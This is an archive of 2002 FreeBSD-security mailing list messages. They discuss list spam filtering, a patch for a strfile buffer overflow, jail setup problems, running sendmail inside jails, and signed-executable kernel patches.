from cithaeron.argolis.org (bgm-24-169-166-7.stny.rr.com [24.169.166.7]) by hub.freebsd.org (Postfix) with ESMTP id B754637B407 for ; Sun, 5 May 2002 16:27:29 -0700 (PDT) Received: from cithaeron.argolis.org (localhost [127.0.0.1]) by cithaeron.argolis.org (8.12.3/8.12.3) with ESMTP id g45NRPc7069038; Sun, 5 May 2002 19:27:25 -0400 (EDT) (envelope-from piechota@argolis.org) Received: from localhost (piechota@localhost) by cithaeron.argolis.org (8.12.3/8.12.3/Submit) with ESMTP id g45NROL4069035; Sun, 5 May 2002 19:27:24 -0400 (EDT) X-Authentication-Warning: cithaeron.argolis.org: piechota owned process doing -bs Date: Sun, 5 May 2002 19:27:24 -0400 (EDT) From: Matt Piechota To: Colin Faber Cc: security@FreeBSD.ORG Subject: Re: You've Been Removed! In-Reply-To: <3CD59C0A.306681E3@fpsn.net> Message-ID: <20020505192605.M59456-100000@cithaeron.argolis.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, 5 May 2002, Colin Faber wrote: > Maybe it's time to re-evaluate the way the list rules are setup? It > would appear there some some punk hell bent against this list. Maybe they're trying to DOS attack the Art Gallery List Server. :) -- Matt Piechota To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 16:28:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from urdvg002.mx.net (urdvg002.mx.net [165.212.11.2]) by hub.freebsd.org (Postfix) with SMTP id 0784137B401 for ; Sun, 5 May 2002 16:28:25 -0700 (PDT) Received: (qmail 21000 invoked from network); 5 May 2002 23:28:04 -0000 Received: from imapcorp.postoffice.net (HELO uadvg201.cms.usa.net) (165.212.11.132) by corprelay.cms.usa.net with SMTP; 5 May 2002 23:28:04 -0000 Received: USA.NET MXFirewall, messaging filters applied; Sun, 05 May 2002 23:26:21 GMT Received: from uwdvg007.cms.usa.net [165.212.8.7] by uadvg132.cms.usa.net via mtad (CM.1201.1.04A) with ESMTP id 701geeXAR0289M32; Sun, 05 May 2002 23:26:17 GMT Message-ID: <20020505232818.29316.qmail@uwdvg007.cms.usa.net> Received: from 192.115.8.147 [192.115.8.147] by uwdvg007.cms.usa.net (USANET web-mailer CM.0402.1.01C); Sun, 05 May 2002 23:28:18 -0000 Date: Mon, 06 May 2002 00:28:18 +0100 From: ReDeeMeR To: Subject: Re: [Re: Buffer overflow in /usr/games/strfile] X-Mailer: USANET web-mailer (CM.0402.1.01C) Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I have now constructed a patch for this program and have sent it to FreeB= SD as part of a Problem Report. Thanks for your pointers, and for the two URLs ... next time I'll learn t= o RTFM a little more closely. Thanks again, ReDeeMeR = = Colin Percival wrote: > Given that this is not a security issue -- as you point out, "no ext= ra = > privileges can be gained" -- this is rather off-topic for -security; = > nevertheless, it is less so than discussions of mailing list sender = > restrictions, so I'll go ahead and respond. > If you look at = > http://www.freebsd.org/cgi/cvsweb.cgi/src/games/fortune/strfile/strfile= =2Ec = > you'll see the CVS log for the file in question. At present it shows t= hat = > the latest change was made six weeks ago; your change has not been = > incorporated. > This isn't really surprising, since FreeBSD is run by volunteers, an= d = > unless they are either provided with a patch or convinced that an issue= is = > vitally important, nothing is likely to happen. You've described a = > problem, worked out how to fix it, described how to fix it... but you = > haven't completed the final two steps: Generating a patch, and submitti= ng = > it as part of a Problem Report. > So, here's what you should do: > 1. Generate a patch for src/games/fortune/strfile/strfile.c. This mean= s = > running `diff -c` on the original file and your fixed version. > 2. Use send-pr to generate a problem report. Make sure the synopsis fi= eld = > starts with [PATCH], and run send-pr with the -a option to include your= = > patch file. > 3. Wait until a committer notices your pr and incorporates your patch. > = > I'd also suggest that you read = > http://www.freebsd.org/doc/en_US.ISO8859-1/articles/problem-reports/artic= le.html > and = > http://www.freebsd.org/doc/en_US.ISO8859-1/articles/contributing/contrib-= how.html > = > Colin Percival > = To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 16:44:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from slc.edu (weir-01c.slc.edu [207.106.89.46]) by hub.freebsd.org (Postfix) with ESMTP id A3D6437B401 for ; Sun, 5 May 2002 16:44:34 -0700 (PDT) Received: (from anthony@localhost) by slc.edu (8.11.6/8.11.6) id g45NkhU00978; Sun, 5 May 2002 19:46:43 -0400 (EDT) (envelope-from anthony) Date: Sun, 5 May 2002 19:46:43 -0400 From: Anthony Schneider To: Colin Percival Cc: ReDeeMeR , FreeBSD-security@FreeBSD.ORG Subject: Re: Buffer overflow in /usr/games/strfile Message-ID: <20020505194643.A934@mail.slc.edu> References: <20020505213314.8762.qmail@uwdvg007.cms.usa.net> <5.0.2.1.1.20020505224651.00afbd78@popserver.sfu.ca> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="TB36FDmn/VVEgNH/" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <5.0.2.1.1.20020505224651.00afbd78@popserver.sfu.ca>; from colin.percival@wadham.ox.ac.uk on Sun, May 05, 2002 at 11:27:49PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --TB36FDmn/VVEgNH/ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sun, May 05, 2002 at 11:27:49PM +0100, Colin Percival wrote: > Given that this is not a security issue -- as you point out, "no extra= =20 > privileges can be gained" -- this is rather off-topic for -security;=20 > nevertheless, it is less so than discussions of mailing list sender=20 > restrictions, so I'll go ahead and respond. I agree that it is not an *active* security hazard, however, it is a potential security hazard were some other extra-privileged program to rely on strfile's functionality for whatever purpose (think termcap buffer overflows...termcap itself, a library, is not a setuid application, but xterm, which runs setuid root, replies on termcap, and buffer overflows have occurred where a user crafts a malicious termcap file and launches xterm, overflowing a buffer in some termcap routine, and getting dropped to a shell with the same privileges that xterm was run under). /$.02 -Anthony. ----------------------------------------------- PGP key at: http://www.keyserver.net/ http://www.anthonydotcom.com/gpgkey/key.txt Home: http://www.anthonydotcom.com ----------------------------------------------- --TB36FDmn/VVEgNH/ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjzVxGMACgkQ+rDjkNht5F1MqACeIjkLhrkRy02TWjq0690VWXct /78AnjtsFBR7qtpc/4t4Eg0bOA5Vx57B =xgwR -----END PGP SIGNATURE----- --TB36FDmn/VVEgNH/-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 16:53:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f145.law9.hotmail.com [64.4.9.145]) by hub.freebsd.org (Postfix) with ESMTP id B451437B400 for ; Sun, 5 May 2002 16:53:13 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Sun, 5 May 2002 16:53:13 -0700 Received: from 131.211.221.28 by lw9fd.law9.hotmail.msn.com with HTTP; Sun, 05 May 2002 23:53:13 GMT X-Originating-IP: [131.211.221.28] From: "Maarten M." To: jedgar@fxp.org Cc: freebsd-security@FreeBSD.org Subject: Re: Jail() in 4.6-pre* Date: Mon, 06 May 2002 01:53:13 +0200 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 05 May 2002 23:53:13.0672 (UTC) FILETIME=[04D68480:01C1F490] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >On Sat, May 04, 2002 at 02:31:00PM -0400, Michael Sharp wrote: > > I used jail in 4.5-STABLE ( following man jail ), but today I went > > ahead and cvsup'ed to 4.6-pre*, made world, etc... no errors... > > followed man jail... no errors until: > > > > cd /path/to/jail/dev; sh MAKEDEV jail gave me : > > MAKEDEV unknown file or directory. > > > > MAKEDEV isnt even on the system. > > > > Is Jail not working in 4.6* yet, or has something changed with MAKEDEV? It seems that i have the same problem unfortunately. > >This appears to be related to changes made in etc/Makefile revs. >1.219.2.27/1.247 where NO_MAKEDEV does not install MAKEDEV anymore >instead of only not running 'sh MAKEDEV all'. It appears we need to >MFC src/usr.sbin/jail/jail.8 rev. 1.24 to reflect this. > >For the present time, use: > ># make distribution DESTDIR=$D -DNO_MAKEDEV_RUN When i use this im still getting an error : make: don't know how to make distribution. Stop How can i fix this? mbmidden. _________________________________________________________________ Chat with friends online, try MSN Messenger: http://messenger.msn.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 17:14:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by hub.freebsd.org (Postfix) with ESMTP id 5FCBE37B400 for ; Sun, 5 May 2002 17:14:10 -0700 (PDT) Received: (from dillon@localhost) by apollo.backplane.com (8.11.6/8.9.1) id g460DYn54044; Sun, 5 May 2002 17:13:34 -0700 (PDT) (envelope-from dillon) Date: Sun, 5 May 2002 17:13:34 -0700 (PDT) From: Matthew Dillon Message-Id: <200205060013.g460DYn54044@apollo.backplane.com> To: Nils Holland Cc: Colin Faber , security@FreeBSD.ORG Subject: Re: You've Been Removed! References: <200205051832.OAA29652@matterhorn.pinn.net> <3CD59C0A.306681E3@fpsn.net> <20020505233756.A8532@daemon.tisys.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I think the lists should remain open. A perfect solution would be to have the mail system keep a database of originators (From: and the first Received: header). Whenever it sees an email from someone not in the database it would request that the person acknowledge that they really intended to send the email and, if they do, their email goes through and they are added to the database (so it only asks them once). I've been contemplating writing such a beast for myself, since 90% of the email I receive these days is spam. I'm sure others have written similar things so I'm wondering if there is a solution out there already. At some point I'm going to write mine (as a standalone MX relay so it could be tied into any system), when I have more time available. -Matt :This issue comes up every now and then, mostly when viruses or other spam :gets sent to the FreeBSD lists (though this constantly repeating "You've :been added / You've been removed) thing was the most interesting thing I :saw in the last few months ;-) : :Anyway, my opinion has always been that *all* FreeBSD lists should be in :"subscribers may only post" mode, while FreeBSD-questions should remain :open for all, as many people only see that list's address mentioned in the :default motd and post messages to it without wanting to be constantly :signed up. However, for the other FreeBSD lists where the majority of :users are not "I-only-post-when-I-have-a-problem" folks, but rather :"core members" (i.e. constantly subscribed), I guess that if these list :only granted posting access to subscribers, a lot of hassles could be :saved. : :Greetings :Nils : :-- : :Nils Holland To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 17:15:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 813BE37B406 for ; Sun, 5 May 2002 17:15:40 -0700 (PDT) Received: by peitho.fxp.org (Postfix, from userid 1000) id A8E1713669; Sun, 5 May 2002 20:15:39 -0400 (EDT) Date: Sun, 5 May 2002 20:15:39 -0400 From: Chris Faulhaber To: "Maarten M." Cc: jedgar@fxp.org, freebsd-security@FreeBSD.org Subject: Re: Jail() in 4.6-pre* Message-ID: <20020506001539.GA93411@peitho.fxp.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="4Ckj6UjgE2iN1+kY" Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.24i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --4Ckj6UjgE2iN1+kY Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, May 06, 2002 at 01:53:13AM +0200, Maarten M. wrote: > >For the present time, use: > > > ># make distribution DESTDIR=3D$D -DNO_MAKEDEV_RUN >=20 > When i use this im still getting an error : >=20 > make: don't know how to make distribution. Stop > How can i fix this? >=20 Fix your sources? If you cannot 'make distribution' in /usr/src/etc, something else is screwed. --=20 Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org --4Ckj6UjgE2iN1+kY Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) Comment: FreeBSD: The Power To Serve iD8DBQE81csrObaG4P6BelARAlovAJ0XIxJvDjdFgfRLPzKZTO/js6TQRQCdEgt2 s2If/Turjn1dYF30Spb+kGY= =vRWh -----END PGP SIGNATURE----- --4Ckj6UjgE2iN1+kY-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 17:27:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by hub.freebsd.org (Postfix) with ESMTP id 6B7E837B403 for ; Sun, 5 May 2002 17:27:42 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by clink.schulte.org (Postfix) with ESMTP id E7CEB24422; Sun, 5 May 2002 19:27:40 -0500 (CDT) Received: from tarmap.nospam.schulte.org (tarmap.schulte.org [209.134.156.198]) by clink.schulte.org (Postfix) with ESMTP id BFD6F2441D; Sun, 5 May 2002 19:27:38 -0500 (CDT) Message-Id: <5.1.0.14.2.20020505192603.03dccc20@pop3s.schulte.org> X-Sender: X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Sun, 05 May 2002 19:27:35 -0500 To: Matthew Dillon , Nils Holland From: Christopher Schulte Subject: Re: You've Been Removed! Cc: Colin Faber , security@FreeBSD.ORG In-Reply-To: <200205060013.g460DYn54044@apollo.backplane.com> References: <200205051832.OAA29652@matterhorn.pinn.net> <3CD59C0A.306681E3@fpsn.net> <20020505233756.A8532@daemon.tisys.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre6 on clink.schulte.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 05:13 PM 5/5/2002 -0700, Matthew Dillon wrote: > I think the lists should remain open. A perfect solution would be > to have the mail system keep a database of originators (From: and > the first Received: header). Whenever it sees an email from someone > not in the database it would request that the person acknowledge > that they really intended to send the email and, if they do, their > email goes through and they are added to the database (so it only > asks them once). > > I've been contemplating writing such a beast for myself, since 90% > of the email I receive these days is spam. I'm sure others have > written similar things so I'm wondering if there is a solution out > there already. At some point I'm going to write mine (as a standalone > MX relay so it could be tied into any system), when I have more time > available. Never used it personally, but this seems to do what you describe: /usr/ports/mail/tmda http://tmda.sourceforge.net/ > -Matt -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 17:55:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id 0541837B408 for ; Sun, 5 May 2002 17:55:10 -0700 (PDT) Received: (qmail 83536 invoked by uid 1000); 6 May 2002 00:55:31 -0000 Date: Mon, 6 May 2002 02:55:31 +0200 From: "Karsten W. Rohrbach" To: Christopher Schulte Cc: Matthew Dillon , Nils Holland , Colin Faber , security@FreeBSD.ORG Subject: Re: You've Been Removed! Message-ID: <20020506025531.A83460@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , Christopher Schulte , Matthew Dillon , Nils Holland , Colin Faber , security@FreeBSD.ORG References: <200205051832.OAA29652@matterhorn.pinn.net> <3CD59C0A.306681E3@fpsn.net> <20020505233756.A8532@daemon.tisys.org> <200205060013.g460DYn54044@apollo.backplane.com> <5.1.0.14.2.20020505192603.03dccc20@pop3s.schulte.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="6c2NcOVqGQ03X4Wi" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <5.1.0.14.2.20020505192603.03dccc20@pop3s.schulte.org>; from schulte+freebsd@nospam.schulte.org on Sun, May 05, 2002 at 07:27:35PM -0500 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer X-Work-URL: http://www.ngenn.net/ X-Work-Address: nGENn GmbH, Schloss Kransberg, D-61250 Usingen-Kransberg, Germany X-Work-Phone: +49-6081-682-304 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --6c2NcOVqGQ03X4Wi Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Christopher Schulte(schulte+freebsd@nospam.schulte.org)@2002.05.05 19:27:35= +0000: > Never used it personally, but this seems to do what you describe: >=20 > /usr/ports/mail/tmda > http://tmda.sourceforge.net/ for high-volume mailing lists you'll need quite some horsepowers in the corresponding server. tmda is a python program which is invoked for every single mail. having used tmda myself for a while i thought about two alternative approaches which might yield better performance: - implement a lightweight "subscription filter" in C - take tmda and make a server process out of it, with a lightweight wrapper you can stick into a .forward or similar file, so the main rule engine stays there as a sleeping daemon all the time just some rough ideas (as usual, after midnight)... tell me what you think about them /k --=20 > Sex is one of the nine reasons for reincarnation ... the other eight > are unimportant. --Henry Miller WebMonster Community Project -- Next Generation Networks GmbH -- All on BSD http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.n= et/ GnuPG: 0xDEC948A6 D/E BF11 83E8 84A1 F996 68B4 A113 B393 6BF4 DEC9 48A6 REVOKED: 0x2964BF46 D/E 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46 REVOKED: 0x4C44DA59 RSA F9 A0 DF 91 74 07 6A 1C 5F 0B E0 6B 4D CD 8C 44 My mail is GnuPG signed -- Unsigned ones are bogus -- http://www.gnupg.org/ Please do not remove my address from To: and Cc: fields in mailing lists. 1= 0x --6c2NcOVqGQ03X4Wi Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Comment: For info see http://www.gnupg.org iD8DBQE81dSDs5Nr9N7JSKYRAs6LAJwJeKsFk3sR7AX0/X2wqvXbpGOzkACffRL2 SrZmajfP+WlVPcYJEGsHyfY= =qtdV -----END PGP SIGNATURE----- --6c2NcOVqGQ03X4Wi-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 19: 5: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57]) by hub.freebsd.org (Postfix) with ESMTP id 21A6737B400 for ; Sun, 5 May 2002 19:04:57 -0700 (PDT) Received: from fpsn.net (mirc-sucks@unixgr.com [63.224.69.60]) (authenticated) by mail.fpsn.net (8.11.6/8.11.6) with ESMTP id g4624cI63852; Sun, 5 May 2002 20:04:38 -0600 (MDT) Message-ID: <3CD5E4BD.10A3467@fpsn.net> Date: Sun, 05 May 2002 20:04:45 -0600 From: Colin Faber Organization: fpsn.net, Inc. (http://www.fpsn.net) X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: "Karsten W. Rohrbach" Cc: Christopher Schulte , Matthew Dillon , Nils Holland , security@FreeBSD.ORG Subject: Re: You've Been Removed! References: <200205051832.OAA29652@matterhorn.pinn.net> <3CD59C0A.306681E3@fpsn.net> <20020505233756.A8532@daemon.tisys.org> <200205060013.g460DYn54044@apollo.backplane.com> <5.1.0.14.2.20020505192603.03dccc20@pop3s.schulte.org> <20020506025531.A83460@mail.webmonster.de> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This can easily be done with sendmail's milter "Karsten W. Rohrbach" wrote: > > Christopher Schulte(schulte+freebsd@nospam.schulte.org)@2002.05.05 19:27:35 +0000: > > Never used it personally, but this seems to do what you describe: > > > > /usr/ports/mail/tmda > > http://tmda.sourceforge.net/ > > for high-volume mailing lists you'll need quite some horsepowers in the > corresponding server. tmda is a python program which is invoked for > every single mail. having used tmda myself for a while i thought about > two alternative approaches which might yield better performance: > - implement a lightweight "subscription filter" in C > - take tmda and make a server process out of it, with a lightweight > wrapper you can stick into a .forward or similar file, so the main > rule engine stays there as a sleeping daemon all the time > > just some rough ideas (as usual, after midnight)... > tell me what you think about them > > /k > > -- > > Sex is one of the nine reasons for reincarnation ... the other eight > > are unimportant. --Henry Miller > WebMonster Community Project -- Next Generation Networks GmbH -- All on BSD > http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/ > GnuPG: 0xDEC948A6 D/E BF11 83E8 84A1 F996 68B4 A113 B393 6BF4 DEC9 48A6 > REVOKED: 0x2964BF46 D/E 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46 > REVOKED: 0x4C44DA59 RSA F9 A0 DF 91 74 07 6A 1C 5F 0B E0 6B 4D CD 8C 44 > My mail is GnuPG signed -- Unsigned ones are bogus -- http://www.gnupg.org/ > Please do not remove my address from To: and Cc: fields in mailing lists. 10x > > ------------------------------------------------------------------------ > Part 1.2Type: application/pgp-signature -- Colin Faber (303) 736-5160 fpsn.net, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 20: 3:11 2002 Delivered-To: freebsd-security@freebsd.org Received: from stuff.webintl.com (stuff.webintl.com [209.248.144.10]) by hub.freebsd.org (Postfix) with ESMTP id 5841237B400 for ; Sun, 5 May 2002 20:03:05 -0700 (PDT) Received: from [192.168.123.20] (adsl-66-136-237-161.dsl.ltrkar.swbell.net [66.136.237.161]) by stuff.webintl.com (8.9.3/8.9.3) with ESMTP id WAA24520 for ; Sun, 5 May 2002 22:03:03 -0500 Mime-Version: 1.0 X-Sender: freebsd@mail.webintl.com Message-Id: Date: Sun, 5 May 2002 22:03:02 -0500 To: freebsd-security@freebsd.org From: Albert Everett Subject: jails and sendmail Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I've got a machine with three or four jails on it. I'd like to run sendmail in all of them. One jail will do Mailman, another will do email forwarding for clients, another will have an imap server in it, etc. On the host itself, I have in rc.conf: sendmail_enable="NO", instead of "NONE", to allow cron stuff to get mail out. I'd like to have sendmail_enable="YES" in each of my jails. Right now, sendmail doesn't seem to want to start in my jails with ="YES". Is it necessary to tell sendmail inside a jail to listen only on that jail's IP? If so, how is this done? I'm hoping a line or two in the .mc file will do it, but I'm new to editing these files. Is there a problem with the localhost sendmail config being shared around the jails, since localhost really belongs to the host itself (if I understand localhost correctly)? Albert -- ----------------------------------------------------------------------- Albert Everett - Web International, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 20:29: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from horsey.gshapiro.net (horsey.gshapiro.net [209.220.147.178]) by hub.freebsd.org (Postfix) with ESMTP id B4C2337B407 for ; Sun, 5 May 2002 20:29:01 -0700 (PDT) Received: from horsey.gshapiro.net (gshapiro@localhost [IPv6:::1]) by horsey.gshapiro.net (8.12.3/8.12.3) with ESMTP id g463T0Sd009218 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Sun, 5 May 2002 20:29:01 -0700 (PDT) Received: (from gshapiro@localhost) by horsey.gshapiro.net (8.12.3/8.12.3/Submit) id g463T0HA009215; Sun, 5 May 2002 20:29:00 -0700 (PDT) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15573.63612.505244.465190@horsey.gshapiro.net> Date: Sun, 5 May 2002 20:29:00 -0700 From: Gregory Neil Shapiro To: Albert Everett Cc: freebsd-security@FreeBSD.ORG Subject: Re: jails and sendmail In-Reply-To: References: X-Mailer: VM 7.00 under 21.1 (patch 14) "Cuyahoga Valley" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org freebsd> Is it necessary to tell sendmail inside a jail to listen only on that freebsd> jail's IP? If so, how is this done? I'm hoping a line or two in the freebsd> .mc file will do it, but I'm new to editing these files. No, but you need to make sure that the "host" system's sendmail isn't listening on the jail's IP addresses using DAEMON_OPTIONS(). I run a jail system which houses 1 "host" system and three jails. Each of the jail's .mc files are pretty much the same as /etc/mail/freebsd.mc. The "host" system (zim.gshapiro.net is it's hostname) .mc file is: OSTYPE(`freebsd4')dnl define(`confDONT_PROBE_INTERFACES', `True')dnl DAEMON_OPTIONS(`Name=gshapiro.net, Addr=zim.gshapiro.net, Family=inet')dnl DAEMON_OPTIONS(`Name=localhost, Addr=localhost, Family=inet')dnl FEATURE(`no_default_msa')dnl MAILER(`local')dnl MAILER(`smtp')dnl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 22: 9:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mta4-rme.xtra.co.nz (mta4-rme.xtra.co.nz [210.86.15.132]) by hub.freebsd.org (Postfix) with ESMTP id 7C8BC37B404 for ; Sun, 5 May 2002 22:09:03 -0700 (PDT) Received: from netxsecure.net ([210.55.243.112]) by mta4-rme.xtra.co.nz with ESMTP id <20020506050901.ZNKK6747.mta4-rme.xtra.co.nz@netxsecure.net> for ; Mon, 6 May 2002 17:09:01 +1200 Message-ID: <3CD6100D.1BC0890@netxsecure.net> Date: Mon, 06 May 2002 17:09:33 +1200 From: "Michael A. Williams" Reply-To: mike@netxsecure.net X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.4-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd security Subject: Updated Anti-Trojan kernel patches for FreeBSD 5.0 DP1 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Updated kernel option signed_exec patches for FreeBSD 5.0 DP1 Developer Preview One are available from: http://www.trojanproof.org/sigexec-fbsd5.0dp1-0.1.tgz These patches have been tested against 5.0 DP1 The relevant CVS tags are: $FreeBSD: src/sys/i386/conf/GENERIC,v 1.335 2002/02/13 18:47:50 alfred Exp $ $FreeBSD: src/sys/conf/options,v 1.304 2002/03/12 04:00:11 jeff Exp $ $FreeBSD: src/sys/kern/kern_exec.c,v 1.154 2002/02/27 20:57:57 imp Exp $ $FreeBSD: src/sys/kern/kern_linker.c,v 1.79 2002/03/10 23:12:43 dwmalone Exp $ Regards, -- Michael A. Williams Security Software Engineering and InfoSec Manager NetXSecure NZ Limited, http://www.nxs.co.nz Ph: +64.3.318.2973 Fax: +64.3.318.2975 Mob: +64.21.995.914 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 22:17:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from elvis.mu.org (elvis.mu.org [192.203.228.196]) by hub.freebsd.org (Postfix) with ESMTP id A0A5937B405 for ; Sun, 5 May 2002 22:17:20 -0700 (PDT) Received: by elvis.mu.org (Postfix, from userid 1192) id 745A6AE147; Sun, 5 May 2002 22:17:20 -0700 (PDT) Date: Sun, 5 May 2002 22:17:20 -0700 From: Alfred Perlstein To: "Michael A. Williams" Cc: freebsd security Subject: Re: Updated Anti-Trojan kernel patches for FreeBSD 5.0 DP1 Message-ID: <20020506051720.GA36741@elvis.mu.org> References: <3CD6100D.1BC0890@netxsecure.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3CD6100D.1BC0890@netxsecure.net> User-Agent: Mutt/1.3.27i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: 